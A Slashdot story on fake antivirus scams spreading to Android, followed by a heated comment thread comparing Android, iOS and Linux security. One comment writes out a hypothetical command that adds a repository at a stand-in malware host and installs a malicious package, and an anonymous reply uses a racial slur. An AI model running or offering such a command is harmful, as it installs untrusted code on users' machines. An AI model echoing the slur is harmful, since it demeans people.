×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Fake Antivirus Scams Spread To Android

timothy posted more than 2 years ago | from the spreading-the-joy dept.

Android 236

SharkLaser writes "Fake antivirus scams have plagued Windows and Mac OS X during the last couple of years. Now it seems like such scams have spread to Android. Fake antivirus scams on Android work the same as they do on PC's — a user with an Android phone downloads an application or visits a website that says that the user's device is infected with malware. It will then show a fake scan of the system and return hard-coded 'positives' and gives the option the option to buy antivirus software that will 'remove' the malware on the affected system. Android, which is based on Linux, has been plagued with malware earlier too. According to McAfee, almost all new mobile malware now targets Android. Android app stores, including the official one from Google, has also been hosting hundreds of trojan applications that send premium rate SMSes on behalf of unsuspecting users."

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

236 comments

Antivirus as a sign of failure (5, Insightful)

bonch (38532) | more than 2 years ago | (#38558522)

I always believed that the day antivirus software becomes a universally accepted requirement the way it is on Windows is the day the platform has failed and missed the whole point of mobile operating systems. The point is to get away from the big mess of the desktop--the constant maintenance, driver updates, antivirus updates, defragmenters, and other utilities. Mobile operating systems are an opportunity to use a computer just to get things done, not to maintain the computer. That's what was so refreshing about the experience of the using the iPad and why it was such a surprise success to everyone including me.

Re:Antivirus as a sign of failure (1, Insightful)

tqk (413719) | more than 2 years ago | (#38558672)

Mobile operating systems are an opportunity to use a computer just to get things done, not to maintain the computer. That's what was so refreshing about the experience of the using the iPad ...

Why the !@#$ does it always have to come down to Apple iBaubles save the world?!?

Damn, man, if you'd bothered to run Linux/FLOSS all this time, you could have just fscking ignored the whole malware situation entirely, as I've been able to FOR THE LAST TWO DECADES!

Jeebus.

Re:Antivirus as a sign of failure (4, Informative)

0100010001010011 (652467) | more than 2 years ago | (#38558684)

Damn, man, if you'd bothered to run Linux/FLOSS all this time, you could have just fscking ignored the whole malware situation entirely.

You mean like Android? No matter what the adoption rate of Linux or even OpenBSD, you're still going to have dumb users. When you need 'sudo' to install a new app. That same command can be used to install anything.

Re:Antivirus as a sign of failure (5, Insightful)

buchner.johannes (1139593) | more than 2 years ago | (#38558728)

Which is why sudo is being replaced by a policy-based system (some users may have package install rights, network configure rights etc.).

Re:Antivirus as a sign of failure (5, Insightful)

Goaway (82658) | more than 2 years ago | (#38558874)

Which does absolutely nothing when computers on average have one user.

Re:Antivirus as a sign of failure (0)

Anonymous Coward | more than 2 years ago | (#38559004)

That's why you define rights for each application instead of giving applications all the rights of the user.

Re:Antivirus as a sign of failure (3, Insightful)

0100010001010011 (652467) | more than 2 years ago | (#38559172)

Yes. Why didn't Android devs put full thought into having ACLs and the such? I think something like solaris's pfexec! Perfect. I mean the average android phone has probably what, 100, 1,000, 10,000 concurrent users?

Re:Antivirus as a sign of failure (3, Informative)

chrb (1083577) | more than 2 years ago | (#38558742)

When you need 'sudo' to install a new app.

You don't. There have been GUI application installers on Linux for over a decade.

Re:Antivirus as a sign of failure (0)

Overly Critical Guy (663429) | more than 2 years ago | (#38558786)

This is about Android.

Re:Antivirus as a sign of failure (1, Insightful)

Ethanol-fueled (1125189) | more than 2 years ago | (#38558862)

>Can't wait until after work to check Facebook
>Need to show others my "apps" to define my personality for me

Stay Classy, smartphone users.

Re:Antivirus as a sign of failure (-1)

Anonymous Coward | more than 2 years ago | (#38559810)

>Can't wait until after work to check Facebook >Need to show others my "apps" to define my personality for me

Stay Classy, smartphone users.

Speaking of classy ... how do you feel about niggers?

sudo, gksudo, what is difference? (1)

tepples (727027) | more than 2 years ago | (#38558800)

What's the difference between needing sudo and needing gksudo?

Re:sudo, gksudo, what is difference? (1)

chrb (1083577) | more than 2 years ago | (#38559686)

The difference is that you don't type anything on the command line. The post I was responding to was basically claiming that Linux is more vulnerable because you need to type "sudo apt-get blah" to install a package, so then dumb users can be tricked into typing something like "sudo apt-add-repository http://malware.com/ [malware.com] && sudo apt-get install secret-malware". As (supposedly) opposed to OS X and Windows, where the GUI limits the actions of dumb users to only choosing preapproved software from a predefined repository. At least, that is how I interpreted it. The point I was making is that exactly the same package manager GUIs also exist under Linux, and have done for a very long time. Hence dumb users don't have to (and probably won't) use "sudo apt-get ...", they will use the GUI instead, so whatever vulnerabilities exist in this context are exactly the same as on the other operating systems. In fact, I'd go further and say it's worse on the other platforms, as the barrier for installing external software is lower - a "dumb" Linux user has to add an external repository and navigate a package manager, whereas a "dumb" Windows user just has to visit any random web site which will prompt them to download and run an executable file. (Obviously, I am speaking in generalisations, I understand there are PPAs, and that not all Windows users install software from random web sites etc.)

Re:Antivirus as a sign of failure (1)

deathguppie (768263) | more than 2 years ago | (#38559198)

Those installers all need root privileges, so sudo is there one way or the other. The thing about android isn't the privileges issue. In order to install something off the web you need to allow it in the settings. No the issue is that people trust android market place. Hell if you can't trust it what is the point of using it. Google needs to do a better job of vetting apps. That coming from me.. a loyal googlite.. all praise be to the mystic goog who knows all and is all...

Re:Antivirus as a sign of failure (1)

chrb (1083577) | more than 2 years ago | (#38559746)

As far as I know, the vast majority of these "malware apps" are found on random external sites, most of which are supposedly based in China (or at least targeting Chinese users). Certainly, if McAfee is reporting that they have found tens of thousands of these malware apps, then these aren't apps which were available on the official Android Market. The malware that has been found on the official Android Market is in the scale of tens of apps, not thousands.

Re:Antivirus as a sign of failure (2)

bonch (38532) | more than 2 years ago | (#38558744)

Damn, man, if you'd bothered to run Linux/FLOSS all this time, you could have just fscking ignored the whole malware situation entirely, as I've been able to FOR THE LAST TWO DECADES!

What operating system do you think Android is running on?

Re:Antivirus as a sign of failure (1)

froggymana (1896008) | more than 2 years ago | (#38559068)

Damn, man, if you'd bothered to run Linux/FLOSS all this time, you could have just fscking ignored the whole malware situation entirely, as I've been able to FOR THE LAST TWO DECADES!

What operating system do you think Android is running on?

My guess would be Android. If you mean what kernel do you think Android is running on, I would say the Linux kernel.

Re:Antivirus as a sign of failure (1)

bonch (38532) | more than 2 years ago | (#38559512)

Operating system is a vague term that necessarily changes over time as the default software distributions that ship with computers change in scope. Even Wikipedia defines Linux to be a "UNIX-like computer operating system," and even if you disagree with that, the FLOSS qualifier in the post you're replying to refers to the rest of the software suite that most would consider to be the operating system, in the same way the term GNU/Linux does.

Re:Antivirus as a sign of failure (5, Funny)

Overly Critical Guy (663429) | more than 2 years ago | (#38558758)

"Apple iBaulbes"...check.
"fscking"...check.
"Linux/FLOSS"...check.
"Jeebus"...check.
Ayn Rand quote in sig...check.

Are you some kind of Linux stereotype character actor?

Re:Antivirus as a sign of failure (0)

Anonymous Coward | more than 2 years ago | (#38558864)

Ayn Rand quote in sig...check.

Are you some kind of Linux stereotype character actor?

Those wacky, hyper-collectivist, free as in beer and in speech, one-for-the-many, we hate personal ownership of any kind, capitalism is killing us... Ayn Rand fans?

Does not compute.

Re:Antivirus as a sign of failure (2)

PopeRatzo (965947) | more than 2 years ago | (#38559194)

Are you some kind of Linux stereotype character actor?

I'm pretty sure you won't find a lot of Ayn Rand fans among Linux users who have graduated.

Re:Antivirus as a sign of failure (4, Insightful)

Anonymous Coward | more than 2 years ago | (#38558818)

Damn, man, if you'd bothered to run Linux/FLOSS all this time, you could have just fscking ignored the whole malware situation entirely, as I've been able to FOR THE LAST TWO DECADES!

Two decades ago, you had to edit XF86Config just to get your scroll wheel working, and you could fry your monitor if you entered the wrong clock rats. Linux on the desktop has been a disaster up until just a few years ago, and it still has yet to catch up to the big boys. It's a server/embedded OS. There's nothing wrong with that!

Also, /facepalm at the downmods of the OP.

Re:Antivirus as a sign of failure (1)

deathguppie (768263) | more than 2 years ago | (#38559218)

I try as a rule never to enter clock rats, regardless of whether they are the right ones or the wrong ones..

Re:Antivirus as a sign of failure (1)

Anne Thwacks (531696) | more than 2 years ago | (#38559406)

Rats? Why do you think I let my cat use the keyboard - it is not just to accept EULA's, you know!

Re:Antivirus as a sign of failure (2)

PopeRatzo (965947) | more than 2 years ago | (#38559274)

and it still has yet to catch up to the big boys

Why does Linux need to "catch up to the big boys"?

I'm surprised to see this point of view infect so many Slashdot users: The only thing that can possibly validate any tool you use is that a large percentage of the world has to use the exact same tool. Gibson and Fender are the two of the largest, best-known guitar manufacturers on the planet. If I have guitar hand-built by the finest luthier in East of the Mississippi, should I feel bad because my guitar was not made by one of the "big boys"?

Last time I checked, there wasn't a lot that can be done with OSX or Windows that cannot be done on Linux. Except maybe get the Vista 2012 Antivirus hostage-ware or spend $3500 on a medium-powered desktop.

You just don't have to judge yourself based upon whether or not you do what the rest of the world does. Even in technology.

Especially in technology.

Android works great if you're not an idiot. iOS works great if you are an idiot. Quick: which do you choose?

I'll stop back later for your answer. Please show your work.

Re:Antivirus as a sign of failure (2)

Psicopatico (1005433) | more than 2 years ago | (#38559566)

I have guitar hand-built by the finest luthier in East of the Mississippi

But... does that run Linux?

Re:Antivirus as a sign of failure (2)

Luckyo (1726890) | more than 2 years ago | (#38559312)

You can give person freedom, and he may kill himself by being stupid.
You can put the person in a straightacket into a padded room and not be as worried.

Or you can find middle ground rather then painting everything black and white.

Re:Antivirus as a sign of failure (2, Insightful)

bonch (38532) | more than 2 years ago | (#38559574)

For non-techies, a curated software store is the middle-ground. It's third-party software you are free to choose from but vetted by the vendor, which filters a lot of potential problems. The mass deregulation represented by the Android third-party software platform is itself a black-and-white position, often argued for from a freedom perspective. Going back to your post, what if the person you give the freedom to is maliciously tricked into killing themselves? Just as we have an FDA to regulate food, and we have regulatory agencies for other industries, there is value in standards and quality control for software applications. We even have comment moderation on Slashdot to prevent the inevitable degeneration of discussions into a cesspool.

Re:Antivirus as a sign of failure (4, Insightful)

stephanruby (542433) | more than 2 years ago | (#38559362)

I always believed that the day antivirus software becomes a universally accepted requirement the way it is on Windows...

That day occurred when Outlook would run malicious scripts by default found in received email messages, that had access to the entire OS/hard drive, without any needed user intervention.

For Android, I'm not sure that day has arrived yet, the article is derived from the press release of an antivirus company. Of course, it's going to imply that you absolutely need to buy *their* product (instead of using a little bit of street sense).

Now never mind that Google already has the capability of uninstalling malware from Android that was previously downloaded from their Market (or that you can already download a "Kid Mode" launcher to prevent your kids from installing anything, or just press a button to reset your phone to wipe everything and restore it to its factory settings). Does McAfee think it can act much faster than google in identifying and removing malware? Personally, I doubt that. And never mind that an Android user actually has to locate and tick the checkbox for installing apps from unknown sources (which AT&T doesn't let you do anyway), and then has to accept the permissions to install the application in the first place.

It's not like on the iPhone/iPad where you just need to go to a web page with some jpeg image on it and then your iDevice is magically rooted, and then the iPhone user is free to install any type of malware he wants (McAfee or no McAfee). That's one of the reasons that the McAfee anti-virus software on iOS is even more useless on iOS than on Android, since it can't run in the background and it can't even be scheduled to run at different times. On iOS, it couldn't prevent you from going to a malicious site even if it wanted to.

So, use only WiFi-connected Android tablets... (0)

Anonymous Coward | more than 2 years ago | (#38558534)

One reason has earlier been: To preclude the need to keep up 2 SIMs & their associated mobile accounts (1 for phone, 1 for Android tablet)

Now, there's another reason for a WiFi-only Android tablet: To preclude the worry about malware spending user's money with SMS's, etc.

That's a Feature... not a malware-related "bug" :-)

Couple of years? (1)

Ethanol-fueled (1125189) | more than 2 years ago | (#38558548)

Summary:

...last couple of years.

Extortionware has been around for a decade, at least.

Re:Couple of years? (5, Informative)

stephanruby (542433) | more than 2 years ago | (#38558854)

McAfee should know, it's one of them too.

Their free trial virus scanner does the same thing, it's just slightly more subtle about it. I appreciate the fact that it helps clean up cookies, and I hate ad-network cookies as much as the next guy, but labeling each ad-network cookie as a separate infection is only designed to oversell what it does, and alarm non-technical users into ponying up more money for their over-priced software.

And eventually, their software behaves just like most malware anyway. It nags you every year for you to pay to resubscribe. It continually runs in the background slowing down your computer in everything it tries to do. And it ends up stealing a good portion of screen real estate away from a non-sophisticated user, who usually doesn't know how to remove it from his/her internet browser.

Not to mention that on a mobile device, it will also suck the battery dry.
     

Walled gardens.. (4, Interesting)

wbr1 (2538558) | more than 2 years ago | (#38558554)

I hate a fucking walled garden as much as the next guy, but this type of shit is why users will stay with one. Not that a walled garden can't be hijacked, hacked, or otherwise messed with, but by and large it is a cleaner place to be. It is a win-win, both or users who can't, won't, or are too dumb to be bothered with learning a little software/hardware safety, and with corporations who thrive on control and stifling competition.

Re:Walled gardens.. (1)

Threni (635302) | more than 2 years ago | (#38558612)

Why would you want to avoid Android just because other Android users might make bad choices? Why would you care how easily a clueless user can click on `yes, install some random crap which claims to be a virus-checker`? I don't.

Re:Walled gardens.. (1)

wbr1 (2538558) | more than 2 years ago | (#38558778)

Why would you want to avoid Android just because other Android users might make bad choices? Why would you care how easily a clueless user can click on `yes, install some random crap which claims to be a virus-checker`? I don't.

Because the next time that user is going to go to a corporate big brother that filter feeds him what he wants, and in the process that big brother gains more money and power over the free and open solution.

Re:Walled gardens.. (-1, Troll)

macs4all (973270) | more than 2 years ago | (#38558866)

Why would you want to avoid Android just because other Android users might make bad choices? Why would you care how easily a clueless user can click on `yes, install some random crap which claims to be a virus-checker`? I don't.

Why would you put your private data at risk every day just to satisfy some childish ideological paranoia?

Re:Walled gardens.. (0)

Anonymous Coward | more than 2 years ago | (#38558934)

You aren't putting your data at risk, unless you are sharing your android phone with some idiot. The user that is smart enough to download from sources he trusts, check the reviews, watch for unnecessary permissions etc... is not at risk from these scams.

Re:Walled gardens.. (3, Insightful)

macs4all (973270) | more than 2 years ago | (#38559302)

You aren't putting your data at risk, unless you are sharing your android phone with some idiot. The user that is smart enough to download from sources he trusts, check the reviews, watch for unnecessary permissions etc... is not at risk from these scams.

So, I can either just click a link on the iOS App Store and KNOW all that stuff has already been done for me, or waste two hours scouring the internet just to figure out whether some stupid egg timer app is going to sell my soul to the Ukraine right?

I don't know about you; but my time is worth a lot more than that.

The curated collection approach is not perfect; but it sure seems to work out quite well in the real world, where the rest of us live...

Which I believe anyone who is not completely delusional would agree has not been the case so much for the Android "Wild West" approach. Note, for example, that Apple has never had to exercise its "Kill Switch" option for an App already in the Wild; whereas Google has had to do so on several occasions.

Re:Walled gardens.. (1)

Anonymous Coward | more than 2 years ago | (#38559304)

Posting AC so I don't undo my mods.

However, a good chunk of the userbase is going to be dumb, but very vocal. They will install an app without reading reviews, give a blanket "OK" on permissions, then whine to all and sundry how Android is so insecure because it let them shoot themselves in their own foot.

If you know what you are doing with Android, the phone can be a pretty secure platform. Droidwall ensures that unless you give an app the ability to communicate out, it won't (and apps that are bandwidth hogs, you can force only onto Wi-Fi connections). Ad-Free Android blocks by hosts file, and there are some utilities that will block by IP.

However, what is attractive to the iPhone is that the environment is so restricted, so in theory people can't download anything that can hurt them.

Wrong. Run iFirewall on a jailbroken iPhone, and your eyes will be opened. You will see tons of sites that are communicated with constantly by apps, and none of them have anything to do with what you are doing. If one of the apps decided to copy your contact list and upload it, nobody would be the wiser because there is no way to monitor/protect your device unless you JB it, and with 5.x, JB-ing is a pain in the ass.

So, Apple wins here because apps can run wild without damage, while Android, rogue apps are found and one-starred immediately. Different ecosystems.

That's fine, but it goes further (1, Insightful)

SuperKendall (25149) | more than 2 years ago | (#38559080)

Why would you want to avoid Android just because other Android users might make bad choices?

Awesome, I totally support people choosing a platform they are comfortable with managing security on.

Now you aren't recommending Android to non-technical people right? Because I think it's wrong to tell people that CANNOT handle securing of systems, that they should buy and Android phone which I know full well they cannot manage securing properly.

Just as I would not recommend Windows PC's to people back in the day, these days to recommend Android devices to non-technical people is irresponsible.

Re:That's fine, but it goes further (-1)

Anonymous Coward | more than 2 years ago | (#38559426)

You not blowing your own "brains" out is irresponsible.

Re:Walled gardens.. (3, Insightful)

buchner.johannes (1139593) | more than 2 years ago | (#38558616)

I hate a fucking walled garden as much as the next guy, but this type of shit is why users will stay with one. Not that a walled garden can't be hijacked, hacked, or otherwise messed with, but by and large it is a cleaner place to be. It is a win-win, both or users who can't, won't, or are too dumb to be bothered with learning a little software/hardware safety, and with corporations who thrive on control and stifling competition.

You can have a "walled garden" for users (some Android companies have their Appstores), yet still allow people to leave on their own risk. It's not mutually exclusive.
For instance you can install packages from repos in Linux, yet you can also download and install source packages with {./configure&&make&&make install;} if you don't mind the risk of screwing up your system. There is no need to lock out users from their phones.

Maybe you didn't mean "walled gardens" but cared-for repos anyway.

Walls go two ways (2)

SuperKendall (25149) | more than 2 years ago | (#38559050)

You can have a "walled garden" for users (some Android companies have their Appstores), yet still allow people to leave on their own risk.

If anyone can step over it, it's not a wall.

You seem to imply that any Android app store is a walled garden. An App Store is not what makes a wall, the wall is not only what lets applications into a collection of apps but the reach they have beyond once they get in.

Curated collections alone are not enough, you need to also have many layers of system security to bring any kind of meaning to the "wall" of the garden.

Re:Walled gardens.. (1)

Anonymous Coward | more than 2 years ago | (#38558652)

So how does one know? All of this pontificating about dumb or lazy users doesn't really help. How do I distinguish a download of Uno, for example, that has embedded malware from one that doesn't?

Re:Walled gardens.. (2)

vlm (69642) | more than 2 years ago | (#38558738)

I'm a total noob to android (happily on Republic Wireless for like 8 days now) but even I know that on the market page, the requested permissions will be whacked out (like why would Uno need access to send SMS messages?). The other thing on the market page, unless you're the lucky first user, is you'll have low reviews and comments complaining about how the app is a SMS spam sender etc etc.

Re:Walled gardens.. (0)

Anonymous Coward | more than 2 years ago | (#38558964)

The other thing on the market page, unless you're the lucky first user, is you'll have low reviews and comments complaining about how the app is a SMS spam sender etc etc.

Only a greedy idiot would write a trojan app that immediately started misbehaving.
Anyone with an ounce of sense would add in a 'grace period' so the app appears normal to the user. That way, the app has a chance to build up a decent reviews, thus luring in even more users.

Re:Walled gardens.. (4, Informative)

shellbeach (610559) | more than 2 years ago | (#38559416)

So how does one know? All of this pontificating about dumb or lazy users doesn't really help. How do I distinguish a download of Uno, for example, that has embedded malware from one that doesn't?

One word: permissions. When you install an app on Android, you will be prompted with the permissions the app is requesting, and asked if you want to install it. You, the user, have a very good breakdown of exactly what an app can do before it gets installed. And for sending SMSes, it's extremely clear -- the permission is described first as "Services that cost you money" and will then list that it can send SMS messages. It should be obvious that Uno has no need to be sending SMSes on your behalf.

So anyone who gets burnt by these schemes would have to (a) search for a dodgy "free" version of a popular paid app and (b) install it even when there was a warning that it was going to potentially send costly SMSes. I know there are suckers born every minute, but you'd have to be a really, really cheap and stupid one to get hit by this.

Of course, potentially Google should have predicted this and included an "Allow always/allow once/reject" prompt the first time a third-party app attempts to make a phone call or send an SMS. It's probably not a bad idea ...

Re:Walled gardens.. (0)

Anonymous Coward | more than 2 years ago | (#38558740)

Here's an analogy for you:

If you somebody can't be trusted with reality enough, to survive outside of a cage of rubber walls ... then maybe that's where he belongs.

I say let's take the warning labels, rubber padding and "it's for your own security" off of everything, and let the problem solve itself.

Re:Walled gardens.. (0)

Anonymous Coward | more than 2 years ago | (#38559356)

Exactly. Apple curates their garden, Android instead lets you self-curate by filling your screen with a manifest of what the app will have access to when you tap install. The latter looks like a EULA and 99% of users are going to click install no matter what it says.

Too open for its own good (1)

LostCluster (625375) | more than 2 years ago | (#38558560)

The reason iOS devices don't need anti-malware solutions is because all of the programs that run on that platform are from a secure and curated Apple App Store. Google's "anybody can open an app store" policy means Google can't killbit programs it doesn't like, while Apple can killbit anything it wants even after the fact. Bait-and-switch programs only exist on platforms where there's no control in what can be published.

Re:Too open for its own good (0)

Megane (129182) | more than 2 years ago | (#38558590)

The reason iOS devices don't need anti-malware solutions is because Android is a much easier target.

FTFY.

Steve Jobs is laughing from beyond the grave.

Re:Too open for its own good (1)

ColdWetDog (752185) | more than 2 years ago | (#38558656)

You could certainly do this with iOS - just have a webpage with the fake scanner and the false positives and then an offer to clean it off - from the web, no app to download! What could be simpler?

Re:Too open for its own good (3, Insightful)

LostCluster (625375) | more than 2 years ago | (#38558938)

Yeah, but where would the fake webpage buy its traffic from? Apple controls in-app ads, and Google censors its search ads all the time. A fake antivirus website that nobody visits is not a problem at all.

Re:Too open for its own good (0)

VortexCortex (1117377) | more than 2 years ago | (#38558750)

So, wait... If my "scam" website uses referrer headers to target iOS instead of Android browsers, then all of a sudden Android is the secure one right? Oh, by the way, my AntiVirus detector for $YOUR_OS shows that $YOUR_OS is infected with { random(100) + 20 } Viruses! I'll post the instructions for how to remove them all. But, to make it worth my while, post your credit card number, expiration date and security code (on the back), and I'll just take $25.00 out... or we can do this securely via pay-palls.com...

(Oh Noes! Now AntiVirus Scams have spread to Slashdot too! -- Unless, if I get your gist, you're browsing with iOS, then you won't see the above?)

Also, Apple's App Store has had Trojans slip thru their "screening process". My favorite one was when some teenager made a "Torch" app that also enabled teathering. Apple pulled the app after they found out about the extra trojan feature. By your logic: This was a good thing for them to do?

Walled Gardens are the TSA Security Theater of the mobile space (coming soon to a PC near you!) I prefer my gardens (software distribution channels) to be gated and have keys that I control.

Also: You can't make idiot proof security, the Universe will create smarter idiots.
"Those who trade convenience for security deserve neither, and will have none."
-Benjamin Franklin

How would that work? (2)

SuperKendall (25149) | more than 2 years ago | (#38558942)

So, wait... If my "scam" website uses referrer headers to target iOS instead of Android browsers, then all of a sudden Android is the secure one right?

No, because even if you target iOS what will happen? Exactly nothing, because your virus-laden app is not in the app store.

Android has a lot more avenues of attack, including real applications - and many users who have purposefully allowed external downloads (even the Amazon market tells you to disable that block).

Re:Too open for its own good (4, Insightful)

macs4all (973270) | more than 2 years ago | (#38558966)

Walled Gardens are the TSA Security Theater of the mobile space (coming soon to a PC near you!)

Not hardly.

When you talk about the TSA, there are literally hundreds of examples of the TSA not catching "banned items". WIth the iOS App Store, there have been what, one or two completely benign "breaches" in three years?

Hardly a fair comparison.

And, when compared with the track record of Android, even in the supposed "official" Android App Store, you would be bat-shit crazy to seriously suggest that Apple's curating of the App Store is "theater".

Re:Too open for its own good (2, Insightful)

Andraax (87926) | more than 2 years ago | (#38558916)

The reason iOS devices don't need anti-malware solutions is because all of the programs that run on that platform are from a secure and curated Apple App Store.

You know, we can make all computer systems secure by forcing people to only get software that has been screened by the government. And we can eliminate all sources of terrorist communication by forcing all telephone calls, email, letters, etc, to go through government "approval" censors. And we can eliminate fraud in the banking system by only allowing transactions that are pre-approved by the government. And we can improve car safety by only allowing people to buy cars supplied by the government.

And I wouldn't want to live in that world.

Actually, no. (2)

SuperKendall (25149) | more than 2 years ago | (#38558982)

You know, we can make all computer systems secure by forcing people to only get software that has been screened by the government.

You mean like an App TSA?

Yeah THAT would sure be a great idea.

No, the reason why Apple's security works is not JUST the app screening. It's defense in depth - app screening, sandboxing (prevention of hidden SMS), disallowing externally loaded apps without jailbreaking.

Also the real reason the screening does anything at all is not because Apple is so great at screening for security issues (they are not nor can anyone be) but because you have to go through the process of making an identity Apple trusts enough to allow app submission with. That's way too much effort for way to little payout since Apple could and would quickly pull any app found to have a real virus of some kind, and again even if you can get a malicious app in the store what could it really do?

The Apple (and Microsoft BTW) model works best for end users really because users that do not know any better are protected, while technical users who can handle the responsibility or removing layers of security can jailbreak and side load any apps they like.

Oh great (1)

MichaelSmith (789609) | more than 2 years ago | (#38558644)

I am currently helping a family friend who's windows 7 laptop is loaded with cruft. He used my wifi a few months ago and I noticed it was exchanging UDP packets with various ADSL lines around the world. I advised him to reinstall it then but he pointed to all the shields on IE and insisted that they meant it was secure. So now his web browsers refuse to work at all. He doesn't have his installation disk here. It has to be sent from Malaysia. I hope his family are sending him the actual disk which came with the laptop and not one they got for ten RM in a market. In the mean time he is up and running with an ubuntu live CD.

The implication of this article is that the same mess is going to start happening with phones and tablets,

Re:Oh great (0, Troll)

Anonymous Coward | more than 2 years ago | (#38558658)

Why wouldn't you just download a pirated copy of the Windows 7 for the guy? You don't sound like a very good friend...

Re:Oh great (-1, Troll)

macs4all (973270) | more than 2 years ago | (#38558988)

he implication of this article is that the same mess is going to start happening with Android phones and tablets,

FTFY

Wrong, not with "phones and tablets" (2)

SuperKendall (25149) | more than 2 years ago | (#38559022)

The implication of this article is that the same mess is going to start happening with phones and tablets,

No.

The implication is this IS happening on Android phones and tablets. not just any "phones and tablets". WP7 and IOS both have enough controls in place that average users will not be affected much at all by viruses, for all sorts of reasons.

Android has made it too easy for average non-technical users to download apps from anywhere, for those apps to fundamentally change the system in ways the user may not comprehend. And so they are suffering the fate of those who would bring the sins of the past forward into smaller devices.

Technical users or those with technical friends can still easily open up iOS and WP7 but at least it's a more conscious and directed choice.

McAfee (2)

symbolset (646467) | more than 2 years ago | (#38558660)

I had hoped being owned by Intel would class up their act. Apparently not. Doubtless they sell a cure for this "threat".

Re:McAfee (2)

Smurf (7981) | more than 2 years ago | (#38559092)

The only reference to McAfee in TFS is this: "According to McAfee, almost all new mobile malware now targets Android." It also contains the only link o a FA that mentions McAfee.

Thus I deduce that in you opinion, the fact that McAfee made such an assertion is a classless act. That means that you think that McAfee is either lying or bending the truth to suit them best. Or, in other words, you have data than contradicts the last graph of TFA [techcrunch.com] (i.e., the bar plot showing the distribution of malware among mobile platforms [wordpress.com] ).

I will give you the benefit of the doubt, so please feel free to link to that data. Because it's not classy at all to claim that other people are lying unless you have reason to believe that's the case.

Re:McAfee (0)

Anonymous Coward | more than 2 years ago | (#38559460)

That means that you think that McAfee is either lying or bending the truth to suit them best.

I dont know what he thinks, but after 30 years in the business, I'd be astonished if Make-A-Fee had not written BOTH the mobile trojans themselves.

According to McAfee.... (1)

Kenja (541830) | more than 2 years ago | (#38558682)

According to McAfee, Apple hasn't yet let us sell our "anti virus" app for iOS so we're saying you should buy the Android one.

I suspect it's because it's still "legal". (0)

Anonymous Coward | more than 2 years ago | (#38558718)

Or is there any risk for the makers of that stuff?

No? Then even if you have "laws", they aren't worth the paper they are written on.

Then again, it's probably a good thing, with helping natural selection prevent the Idiocracy which humanity works so hard to become.

Still going on (4, Insightful)

Pop69 (700500) | more than 2 years ago | (#38558784)

The weekly/monthly stories that try to implant into peoples minds.

Android = Linux = Malware

Users are stupid whatever OS/Hardware they use, they will click on shit like this just because it pops up and they've never bothered to educate themselves about what it really means.

Bad Statistics (2)

chrb (1083577) | more than 2 years ago | (#38558792)

"Number of new fake malware" is not that same as "number of malware infections". With the right tool you can generate an infinite number of malware variants. The statistic from McAfee includes every single individual file that contains some malware - this is like saying that, for an old school virus that infects .exe files on Windows, that every single infection counts as a different "unique malware instance". And if one of these is uploaded to an app store - even an app store that nobody uses, even for a "unique malware instance" that nobody ever installs - then it gets counted by McAfee. The equivalent in the iPhone world would be counting all malware in every random Cydia repository on the web. Obviously there is a big difference between a random repository on the web, and something being distributed by the official repository.

What would actually be useful is to know the number of malware instances that have made it on to app stores that people actually use (eg the official one), how many people installed them, and how long it was before the app was removed. But obviously this number would be much lower, and so generate far fewer page hits.

Re:Bad Statistics (1)

jo_ham (604554) | more than 2 years ago | (#38559044)

What would actually be useful is to know the number of malware instances that have made it on to app stores that people actually use (eg the official one), how many people installed them, and how long it was before the app was removed. But obviously this number would be much lower, and so generate far fewer page hits.

So, wait... the supposed major benefit of Android over iOS, that you can go outside the main app store, is something that no one actually uses?

Or is this just true when its negative features are brought into the spotlight?

Re:Bad Statistics (1)

oakgrove (845019) | more than 2 years ago | (#38559328)

The major benefit of Android over iphone is there is an Android phone on your carrier at the price you want to pay. But don't let something like the truth get in the way of a gois okd fashion platform bash...oh, you didn't!

Re:Bad Statistics (1)

thegarbz (1787294) | more than 2 years ago | (#38559064)

The installed point is a good one.

All Android phones I've heard of has the "Unknown Sources" option disabled by default which will block people from using their non-official app store or simply installing the apk. There are good reasons to uncheck this option, but I'm willing to bet that most commonly the people who do uncheck these are also the kind of power users who don't fall for malware which relies on the stupidity of users.

I don't see this malware spreading too quickly unless it finds its way into an official app store.

Re:Bad Statistics (0)

Anonymous Coward | more than 2 years ago | (#38559658)

From what understand even the official android app store has had malware on it. I might be wrong tho, does anyone else know?

Any good anti virus software fpr Android? (1)

Billly Gates (198444) | more than 2 years ago | (#38558816)

I browse the web a lot with it. But I feel eventually there will be buffer overflow, flash, various vector attacks, that will compromise my phone.

It seems Andriod's java api is very very limited to internals which is bad as you can't make a shield like you can in Windows. Anyone have a suggestion?

Re:Any good anti virus software fpr Android? (1)

Celexi (1753652) | more than 2 years ago | (#38558880)

There is no good antivirus for android, maybe you could mod a linux one. But still it would take long way until it could be used. Big Problem here is the android Market being open, it should at the very least search in applications for malware patterns on the applications uploaded and put them to manual review or something.

Re:Any good anti virus software fpr Android? (1)

macs4all (973270) | more than 2 years ago | (#38559016)

I browse the web a lot with it. But I feel eventually there will be buffer overflow, flash, various vector attacks, that will compromise my phone.

It seems Andriod's java api is very very limited to internals which is bad as you can't make a shield like you can in Windows. Anyone have a suggestion?

Buy an iPhone.

There. I said it. But I doubt you'll listen...

Re:Any good anti virus software fpr Android? (0)

Anonymous Coward | more than 2 years ago | (#38559496)

Are you gonna buy it for me, bitch? Can I get my tmobile 3G data with it? Thought not. STFU, faggot.

Re:Any good anti virus software fpr Android? (1)

dissy (172727) | more than 2 years ago | (#38559558)

Obvious troll, but for anyone else: yes it will work just fine on tmobile g3, as mine was for the first year before switching to at&t.

PS if you are not willing to pay for a phone, you won't be able to get an android for $0 or less either.

Re:Any good anti virus software fpr Android? (0)

Anonymous Coward | more than 2 years ago | (#38559584)

Go fuck yourself.

There I said it. But I doubt you'll listen...

Anti-Virus is scam, always! (-1)

Anonymous Coward | more than 2 years ago | (#38558840)

Those I help with computers ask what Anti-Virus program to use. I tell them none, anything that says it is anti-virus is a virus. The whole security industry is a scam, avoid it! Their computer run better and I do not have to remove spyware claiming they have a virus any more!

"A sign that Android has arrived?" (2)

erroneus (253617) | more than 2 years ago | (#38558882)

Nah, not really... but I couldn't think of a better title.

